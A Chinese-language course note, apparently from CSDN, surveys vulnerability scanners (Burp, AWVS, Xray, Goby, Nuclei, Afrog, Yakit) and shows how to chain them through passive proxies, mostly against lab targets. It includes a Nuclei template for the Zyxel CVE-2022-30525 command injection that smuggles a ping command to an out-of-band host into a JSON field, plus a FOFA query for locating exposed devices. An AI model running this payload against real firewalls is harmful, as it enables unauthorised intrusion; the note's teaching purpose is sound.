漏洞发现-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动

本文介绍了当前主流的漏洞扫描工具如BurpSuite、Acunetix、Xray、Goby、Nuclei等,涵盖Web、框架组件、APP等领域,强调了它们的综合扫描、特征扫描和联动扫描功能,以及Poc开发和相关插件的使用。文章还展示了工具之间的联动扫描应用场景和优缺点分析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点

1、综合类-Burp&Xray&Awvs&Goby
2、特征类-Afrog&Yakit&Nuclei
3、联动类-主动扫描&被动扫描&中转扫描

章节点:
漏洞发现-Web&框架组件&中间件&APP&小程序&系统
扫描项目-综合漏扫&特征漏扫&被动漏扫&联动漏扫
Poc开发-Ymal语法&联动导入&项目拓展
扫描插件-Burpsuite插件&浏览器插件

在这里插入图片描述

市面上有很多漏扫系统工具脚本,课程讲到的基本都是目前主流推荐的优秀项目!
Burpsuite,Awvs,Xray,Goby,Afrog,Yakit,Nuclei,Vulmap,Pocassist,Nessus,Pentestkit,Kunyu,Pocsuite3,浏览器各类插件,Burpsuite插件(HaE,ShiroScan,FastJsonScan,Log4j2Scan,Springscan,JScan等)。

BurpSuite是用于攻击web 应用程序的集成平台,包含了许多工具。BurpSuite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

Acunetix一款商业的Web漏洞扫描程序,它可以检查Web应用程序中的漏洞,如SQL注入、跨站脚本攻击、身份验证页上的弱口令长度等。它拥有一个操作方便的图形用户界面,并且能够创建专业级的Web站点安全审核报告。新版本集成了漏洞管理功能来扩展企业全面管理、优先级和控制漏洞威胁的能力。

Xray是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持Windows /macOS /Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 漏洞探测需求。

Goby是一款新的网络安全测试工具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速的从一个验证入口点,切换到横向。能通过智能自动化方式,帮助安全入门者熟悉靶场攻防,帮助攻防服务者、渗透人员更快的拿下目标。

Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。 提供TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。(注意:不同工具的yaml模板都不同,无法做到通用)

Afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描(挖洞)工具,PoC 涉及 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。

Yakit是一款集成化单兵安全能力平台,通过函数提供各类底层安全能力,包括端口扫描、指纹识别、poc框架、shell管理、MITM劫持、强大的插件系统等。旨在打造一个覆盖渗透测试全流程的网络安全工具库。

一、演示案例-特征类-三方Poc调用&模版Poc调用

案例1:单点对某特征点进行安全评估

docker拉取靶场镜像:
docker run -it -p 8888:8080 vulhub/struts2:s2-053
docker run -it -p 8090:8090 vulhub/fastjson:1.2.45
docker run -it -p 8888:8080 vulhub/shiro:1.2.4

1、Goby-综合类

https://gobysec.net/
GUI界面,使用简单,直接有手就行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、Nuclei-较综合类

官网地址:https://nuclei.projectdiscovery.io/
项目下载:https://github.com/projectdiscovery/nuclei

官方Nuclei-Templates&第三方Nuclei-Templates:
https://github.com/projectdiscovery/nuclei-templates
https://github.com/ExpLangcn/NucleiTP
在这里插入图片描述
扫描批量url

nucle -l urls.txt

扫描单个目标

nuclei -target xxx.com

在这里插入图片描述
加载对应的poc脚本,可以是当前路径下

nuclei -t ./test/
nuclei -t ./test/test.yaml

推荐使用,批量检测urls.txt,poc为test.yaml,输出结果result.txt

nuclei -l urls.txt -t test.yaml -o result.txt

3、Afrog-特征类

https://github.com/zan8in/afrog

Afrog是一款性能卓越、快速稳定、PoC可定制的漏洞扫描(挖洞)工具,PoC涉及CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。

扫描单个目标

afrog -t http://example.com -o result.html

扫描多个目标

afrog -T urls.txt -o result.html

测试单个PoC

afrog -t http://example.com -P ./testing/poc-test.yaml -o result.html

测试多个PoC

afrog -t http://example.com -P ./testing/ -o result.html

4、Yakit-可特征可综合

https://www.yaklang.com/
GUI界面,使用简单,直接有手就行
在这里插入图片描述

案例2:新型对某特征点进行安全评估

例子:CVE-2022-30525: Zyxel 防火墙远程命令注入漏洞
https://blog.csdn.net/weixin_43080961/article/details/124776553

复现:

Fofa:title=="USG FLEX 50 (USG20-VPN)"

nuclei.exe -t Zyxel.yaml -l z.txt

Zyxel.yaml:

id: CVE-2022-30525
info:
  name: cx
  author: remote
  severity: high
  tags: CVE-2022-30525
  reference: CVE-2022-30525
requests:
  - raw:
      - |
        POST /ztp/cgi-bin/handler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8
        
        {"command": "setWanPortSt","proto": "dhcp","port": "1270","vlan_tagged": "1270","vlanid": "1270","mtu": "{{exploit}}","data":""}
        
    payloads:
      exploit:
        - ";ping -c 3 {{interactsh-url}};"
    attack: pitchfork
    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

在这里插入图片描述
在这里插入图片描述

二、演示案例-综合类-主动漏扫&中转联动&被动联动

案例1:单点工具主动对某站点进行安全评估

http://testphp.vulnweb.com/
在这里插入图片描述

awvs

在这里插入图片描述

xray

.\xray_windows_amd64.exe webscan --basic-crawler http://xx/ --html-output xx.html

在这里插入图片描述
在这里插入图片描述

案例2:联动对APP抓包进行安全评估

eg:安卓模拟器某APP应用
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

之后在模拟器上打开APP,bp就会收到相关数据包并转发给xray
在这里插入图片描述

对比工具优缺点

爬虫:常规漏洞测试
Poc:用网上各种组件框架的漏洞去测试
Awvs:爬虫强,Poc国内差点
任务添加&数据头部&代理模式&扫描模式等
Xray:爬虫弱,Poc国内友好

工具联动意义

1、相互联动性解决漏扫(APP、小程序等)
2、相互联动性解决URL未探针

Burp&Xray联动-抓包给xray扫

在这里插入图片描述
在这里插入图片描述
1、主-Burp设置转发代理
在这里插入图片描述
2、副-Xray设置被动扫描

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

在这里插入图片描述

Awvs&Xray联动-爬虫给xray扫

1、主-Awvs设置代理扫描
在这里插入图片描述
2、副-Xray设置被动扫描

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7788 --html-output xx.html

在这里插入图片描述

Awvs&Burp&Xray中转联动-都扫看流量

1、主-Awvs设置代理扫描
在这里插入图片描述
2、中-Burp设置转发代理
在这里插入图片描述
3、副-Xray设置被动扫描

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

在这里插入图片描述

Gourdscan v2.1 被动漏洞描系统 Passive Vulnerability Scan 为避免 Gourdscan 被恶意利用,开源版本只放出了简单的探测规则,无法用作为黑客入侵工具。请使用者遵守《中华人民共和国网络安全法》,勿将 Gourdscan 用于未授权的测试,参与项目的社区成员/YSRC/同程安全应急响应中心/同程网络科技股份有限公司不负任何连带法律责任。 安装依赖: Linux 安装 Redis apt-get install redis-server 或从源码编译安装 wget http://download.redis.io/redis-stable.tar.gz && tar xzf redis-stable.tar.gz && cd redis-stable && make && make install 系统已有 Redis 的,运行 redis-server --version 查看自己的版本,需注意2.x版本的 Redis 会有问题 安转 python 类库 基础模块 安装pip wget https://sec.ly.com/mirror/get-pip.py --no-check-certificate && python get-pip.py -i https://mirrors.aliyun.com/pypi/simple/ $ pip install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 其他事项 以下如果有报错便可以安装,一般不需要安装 镜像: https://sec.ly.com/mirror/libdnet-libdnet-1.12.tar.gz https://sec.ly.com/mirror/pylibpcap-0.6.4.tar.gz $ wget https://github.com/dugsong/libdnet/archive/master.zip && unzip master.zip $ wget http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz && tar zxf pylibpcap-0.6.4.tar.gz Windows 下载 Redis https://sec.ly.com/mirror/Redis-x64-3.2.100.zip 启动 Redis redis-server.exe GourdScan路径\conf\redis.conf 如需使用网卡抓包方式,同程src已有各依赖镜像,可以把exe文件都装上 https://sec.ly.com/mirror/dnet-1.12.win32-py2.7.exe https://sec.ly.com/mirror/dpkt-1.7.win32.exe https://sec.ly.com/mirror/pcap-1.1.win32-py2.7.exe https://sec.ly.com/mirror/WinPcap_4_1_3.exe OSX 安装 homebrew /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 安装 redis brew install redis 启动 redis redis-server conf/redis.conf 安装依赖 pip install pcapy -i https://pypi.doubanio.com/simple/ git clone https://github.com/dugsong/libdnet.git && cd libdnet && ./configure && make && cd python && python setup.py install 使用方法: redis-server conf/redis.conf python gourdscan.py conf.json 默认平台用户名密码为:admin:Y3rc_admin 默认redis密码为:Y3rc_Alw4ys_B3_W1th_Y0u 如果有勾选sqlmap api scan选项,请在服务器上开启sqlmap api。 一切正常的话你就可以在8000端口上访问到 GourdScanV2 的 web 界面了 Start Monitor 中提供了三种代理方式,区别的话在下方文档有
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值